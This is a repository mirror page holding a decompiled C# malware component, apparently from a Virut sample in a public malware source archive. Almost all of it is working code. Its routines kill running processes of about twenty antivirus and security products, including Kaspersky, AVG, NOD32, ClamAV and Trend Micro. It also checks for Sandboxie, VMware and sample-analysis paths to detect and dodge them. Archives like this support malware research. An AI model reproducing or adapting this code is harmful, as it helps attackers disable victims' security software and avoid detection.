ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 11:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Virus/Win32/V/Virus.Win32.Virut.ce-c41c86f44216c3054b1e45e53e91cc0e9df01ff509ab0ed824899d4e8d19800d/Daanteys.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

390 lines
9.9 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: Daanteys
// Assembly: 3, Version=830.23.182.254, Culture=neutral, PublicKeyToken=null
// MVID: 3AB55594-508F-4214-AA1C-DD579280B133
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Virut.ce-c41c86f44216c3054b1e45e53e91cc0e9df01ff509ab0ed824899d4e8d19800d.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;
public class Daanteys
{
public static void Enable()
{
Daanteys.mofa();
Daanteys.aag();
Daanteys.aas();
Daanteys.aav();
Daanteys.aavg();
Daanteys.abg();
Daanteys.acav();
Daanteys.ac();
Daanteys.aen32();
Daanteys.ae();
Daanteys.afprot6();
Daanteys.ak();
Daanteys.ama();
Daanteys.an();
Daanteys.aos();
Daanteys.aop();
Daanteys.apc();
Daanteys.asp();
Daanteys.ass();
Daanteys.ate();
Daanteys.avp();
Daanteys.aza();
}
public static void asb(Form frmSelect)
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
if (!frmSelect.Text.Contains("#"))
goto label_9;
label_2:
num3 = 3;
frmSelect.Close();
ProjectData.EndApp();
goto label_9;
label_4:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
case 5:
case 6:
goto label_9;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_4;
}
throw ProjectData.CreateProjectError(-2146828237);
label_9:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
public static void ama()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "mcagentmcuimgr", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void aavg()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "avgemc", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void aas()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "a2servic", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void aav()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ashWebSv", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void acav()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "clamauto", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void ac()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "cpf", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void ae()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ewido", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void afprot6()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "FPAVServer", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void ak()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "kavsvc", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void abg()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "BullGuard", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void aza()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "VSMON", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void aag()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "antigen", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void an()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "ccapp", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void aos()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "tmlisten", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void apc()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "pccntmon", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void asp()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "earthagent", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void ass()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "spysweeper", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void avp()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "vpcmapvmsrvc", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void aop()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "acs.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
public static void aen32()
{
Process[] processes = Process.GetProcesses();
int num = checked (processes.Length - 1);
int index = 0;
while (index <= num)
{
if (Operators.CompareString(Strings.LCase(processes[index].ProcessName), "nod32.exenod32krn.exeekrn.exe", false) == 0)
processes[index].Kill();
checked { ++index; }
}
}
[DllImport("user32", EntryPoint = "FindWindowA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern long FindWindow([MarshalAs(UnmanagedType.VBByRefStr)] ref string lpClassName, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpWindowName);
public static void mofa()
{
Daanteys.uHmixyIUKrMQgWOandboxie();
Daanteys.IsVmWare();
Daanteys.ate();
}
public static void uHmixyIUKrMQgWOandboxie()
{
if (Process.GetProcessesByName("SbieSvc").Length < 1)
return;
Environment.Exit(0);
}
public static void IsVmWare()
{
string str1 = "VMDragDetectWndClass";
ref string local1 = ref str1;
string str2 = (string) null;
ref string local2 = ref str2;
if (Daanteys.FindWindow(ref local1, ref local2) != 0L)
return;
Environment.Exit(0);
}
private static void ate()
{
if (!Process.GetCurrentProcess().MainModule.FileName.Contains("sample"))
return;
Environment.Exit(0);
}
}
Reference in New Issue View Git Blame Copy Permalink